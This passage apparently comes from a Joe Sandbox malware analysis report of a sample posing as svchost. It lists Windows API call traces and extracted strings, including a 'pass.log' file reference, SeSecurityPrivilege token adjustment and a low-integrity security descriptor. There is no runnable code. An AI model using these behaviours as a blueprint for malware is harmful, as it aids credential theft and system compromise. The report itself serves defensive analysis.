                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3485819771-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02CB52EB
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02CB531C
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 02CB5338
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 02CB533E
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02CB534C
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02CB5364
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1800058468-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02CA2E8E
                                                                                                                                                                                                              • GetWindowTextA.USER32(00000000,?,00000104), ref: 02CA2EA9
                                                                                                                                                                                                                • Part of subcall function 02CA2570: memset.MSVCRT ref: 02CA2587
                                                                                                                                                                                                                • Part of subcall function 02CA2570: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02CA259E
                                                                                                                                                                                                                • Part of subcall function 02CA2570: PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25AB
                                                                                                                                                                                                                • Part of subcall function 02CA2570: PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25E7
                                                                                                                                                                                                                • Part of subcall function 02CA2570: lstrcpynA.KERNEL32(02CE9F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02CA2611
                                                                                                                                                                                                                • Part of subcall function 02CA2570: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2620
                                                                                                                                                                                                                • Part of subcall function 02CA2570: HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2623
                                                                                                                                                                                                                • Part of subcall function 02CA2570: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2630
                                                                                                                                                                                                                • Part of subcall function 02CA2570: HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2633
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2F07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA2F0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2F17
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA2F1A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 649337724-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9BAAF
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9BAD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9BAE2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 02C9BB17
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9BB1E
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9BB2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675675969-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9B92D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9B94B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 02C9B980
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9B987
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9B99B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000005), ref: 02C9B9AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699575883-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(02C9CD24,00000000), ref: 02C9CBFF
                                                                                                                                                                                                              • GetWindowLongA.USER32(02C9CD24,000000F0), ref: 02C9CC19
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(02C9CD24,000000FA,?), ref: 02C9CC34
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(02C9CD24,000000FB,0000003C), ref: 02C9CC61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4167475372-4251816714
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CD41AB
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CD41C1
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,000000FF,?), ref: 02CD41D3
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CD41EF
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02CD420E
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02CD421C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3061335427-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C974A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000), ref: 02C974C6
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C974E4
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C9750D
                                                                                                                                                                                                                • Part of subcall function 02C974A0: RtlAllocateHeap.NTDLL(00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C97514
                                                                                                                                                                                                                • Part of subcall function 02C974A0: memset.MSVCRT ref: 02C97527
                                                                                                                                                                                                                • Part of subcall function 02C974A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C97553
                                                                                                                                                                                                                • Part of subcall function 02C974A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C97563
                                                                                                                                                                                                                • Part of subcall function 02C974A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C97572
                                                                                                                                                                                                                • Part of subcall function 02C974A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C97585
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97594
                                                                                                                                                                                                                • Part of subcall function 02C974A0: HeapValidate.KERNEL32(00000000), ref: 02C9759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,74DF2F00,02CA3D3F), ref: 02C9791C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C97923
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97933
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,74DF2F00,02CA3D3F), ref: 02C97955
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C97958
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97965
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C97968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4191958461-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB137
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAB175
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02CAB1B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                              • String ID: A23C419D$pass.log
                                                                                                                                                                                                              • API String ID: 2713433229-1414824029
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02CB5097,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA41FE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4205
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4215
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4229
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4230
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,02CB4081,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA424A
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638075499-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CB4980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49AD
                                                                                                                                                                                                                • Part of subcall function 02CB4980: GetProcessTimes.KERNEL32(00000000,?,?,?,02CA7967,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49CA
                                                                                                                                                                                                                • Part of subcall function 02CB4980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49E2
                                                                                                                                                                                                                • Part of subcall function 02CB4980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02CA7967,00000000), ref: 02CB49F3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80,000002F0,00000000,00000000,072018B8,02CA7AD4), ref: 02CA7828
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7844
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,072018B8), ref: 02CA7869
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA786C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,072018B8), ref: 02CA7879
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA787C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7887
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3901171168-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustChangeCloseConvertErrorFindFreeInfoLastLocalLookupNamedNotificationPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 141549399-820036962
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02C93B17), ref: 02C93864
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,5dd2bf87a,00000000,?,00000000,?), ref: 02C93885
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02C93893
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: 5dd2bf87a$software\microsoft
                                                                                                                                                                                                              • API String ID: 3677997916-846386698
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CA412B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,02CA1163,00001000,?,?), ref: 02CA413C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02CA414C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CA43D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02CA440C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02CA4438
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02CA445F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02CA44DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAAACC
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAAAF1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02CA1A39), ref: 02CAAB71
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02CA1A39), ref: 02CAAB78
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAAB88
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02CA1A39), ref: 02CAAB9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
